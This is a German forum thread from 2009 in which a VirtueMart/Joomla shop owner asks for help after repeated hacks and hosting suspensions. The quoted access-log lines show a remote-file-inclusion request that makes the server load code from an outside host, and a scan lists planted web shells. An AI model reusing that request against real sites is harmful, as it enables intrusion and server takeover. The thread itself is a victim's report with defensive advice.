Sicherheitslücke in VirtueMart_1.1.2_eCommerce_Bundle_Joomla_1.5.9?

**rvepp** · 14.05.2009 08:59

Hallo alle zusammen!
Habe ein großes Sicherheitsproblem, das ich nun alleine nicht hinbekomme!

Installiert wurde folgende Version: VirtueMart_1.1.2_eCommerce_Bundle_Joomla_1.5.9

Am Anfang lief alles wunderbar, bis plötzlich mein Account vom Provider gesperrt wurde. Auf meine Anfrage kam folgende Antwort:

der Account musste leider komplett gesperrt werden, da es hier innerhalb kürzester Zeit mindestens 3 Angriffe gab.
Vermutlich nutzt der Angreifer eine Sicherheitslücke in Ihrer Software für Codeinjection aus. Sollten Sie hier bereits die Software sowie alle Module auf einen aktuellen Stand gebracht haben, sollten Sie sich hier an den entsprechenden Anbieter wenden. Evtl. existiert hierfür dann schon ein workaround.

Vermutlich hat der Angreifer auch Hackscripte hinterlegt über die dieser immer weider leicht Zugriff bekommt. Diese sind meist so gut versteckt das sie nicht weiter auffallen.
Hier ist die effektivste Lösung den inhalt per FTP einmal zu löschen und ein Backup von vor dem Angriff einzuspielen, besser noch die Software gleich neu aufzusetzen.

So, habe dann alles, bis auf die Datenbanken gelöscht und neu aufgespielt (gleiche Version)
Ein paar Stunden später kam vom Provider folgende E-Mail:

leider gab es wieder einen Spamvorfall.

200.77.70.51 - - [06/May/2009:19:18:30 +0200] "POST //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=h ttp://www.datapop.com.br/suporte//good.txt? HTTP/1.1" 200 231401 "http://www.XXXXX.de//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=h ttp://www.datapop.com.br/suporte//good.txt?" "Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.8) Gecko/2009032609 Firefox/3.0.8" www.XXXXX.de
200.77.70.51 - - [06/May/2009:19:21:27 +0200] "POST //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=h ttp://www.datapop.com.br/suporte//good.txt? HTTP/1.1" 200 241246 "http://www.xxxxx.de//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=h ttp://www.datapop.com.br/suporte//good.txt?" "Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.8) Gecko/2009032609 Firefox/3.0.8" www.xxxxx.de

Auffällig ist immer wieder folgende Datei:
/html/components/com_virtuemart/show_image_in_imgtag.php

Diese scheint anfällig für die Codeinjection zu sein. Leider mussten wir diese wieder sperren.

Folgende Datei:
/html/components/com_virtuemart/show_image_in_imgtag.php
habe ich dann durch eine ersetzt, von der bisher keine Probleme hervor gingen.
Dann war ein paar Tage Ruhe und ich dachte das Problem hat sich erledigt! Ein klarer Fall von Denkste:
Die Homepage wurde wieder gesperrt. Auf Anfrage, ob wieder die oben genannte Datei der Auslöser war, kam folgende Mail:

Die Datei wurde bei einem Aufruf in der access_log erwähnt, allerdings konnte zu dem Zeitpunkt der Sperrung diese Datei nicht mehr auf dem Webaccount gefunden werden.

Ein großes Problem ist aber auch, dass es dort diverse Hackscripte verteilt auf dem Account gibt, wodurch der Angreifer immer wieder unentdeckt Dateien hinterlegen oder manipulieren kann. Die Sicherheitslücke wird/wurde nur genutzt um diese Scripte erstellen zu können.

Folgendes Ergebnis brachte eine händische Überprüfung:
/html/cl.php: Trojan.PHP.C99Shell FOUND
/html/administrator/components/com_virtuemart/clas ses/export/ps_virtuemart.php: PHP.Shell-22 FOUND /html/administrator/components/com_virtuemart/clas ses/ps_user_info.php: PHP.Shell-22 FOUND /html/administrator/components/com_virtuemart/lang uages/help/denmark.php: PHP.Shell-22 FOUND /html/administrator/components/com_virtuemart/lang uages/zona.php: PHP.Shell-22 FOUND /html/administrator/components/com_virtuemart/vers ion.virtuemart.php: PHP.Shell-22 FOUND
/html/components/com_virtuemart/cl.php: Trojan.PHP.C99Shell FOUND

Nun habe alles was mit Virtuemart zusammenhängt überspielt mit einer Version, mit der ich bisher kein Probleme hatte. Hat auch nichts genutzt. Der Account wurde heute wieder geperrt!
Weiss nicht mehr weiter und bitte euch hiermit um Hilfe!!!!

Vielen Dank im voraus!!!!

Gunter

**flotte** · 14.05.2009 11:50

Vollumfänglich mal dies gemacht? Auch alle Zugangsdaten geändert (Superadmins, FTP)?
Weiterhin muss man fragen, warum Du veraltete Software einsetzt?
Weder Joomla 1.5.9 noch VirtueMart 1.1.2 sind aktuell! Beides ist längst überholt - nicht ohne Grund.

**rvepp** · 14.05.2009 12:08

Hallo flotte,
vielen Dank für deine Antwort!
Alle Passwörter und Zugangsdaten (acuh FTP) wurden geändert und der Administrator-Ordner wurde mit htaccess geschützt. Hat alles nichts genutzt.
Ein Backup habe ich leider nicht, das ich einspielen könnte.
Ja, den Schuh muss ich mir anziehen. Habe Joomla, bzw. Virtuemart nicht aktualisiert. Aber die 1.5.9 ist ja auch nicht die Älteste!

Gruß

Gunter

**flotte** · 14.05.2009 12:15

Zitat von rvepp

Aber die 1.5.9 ist ja auch nicht die Älteste!

... Denkfehler. "Frische" Sicherheitslücken sind die gefährlichsten. Uralte Lücken werden oft gar nicht mehr nach gesucht und es gibt den Effekt das Uralt-Script oft "sicherer" sind... aber nur weil diese Lücken nicht mehr so häufiug in den Script-Kiddy-Scripten auftauchen.

Bevor es einer falsch versteht: Wer Uralt-Script einsetzt gehört auf den Mond geschossen.

Thema: Sicherheitslücke in VirtueMart_1.1.2_eCommerce_Bundle_Joomla_1.5.9?

LinkBack

Themen-Optionen

Thema durchsuchen

Anzeige

Sicherheitslücke in VirtueMart_1.1.2_eCommerce_Bundle_Joomla_1.5.9?

Lesezeichen

Lesezeichen

Berechtigungen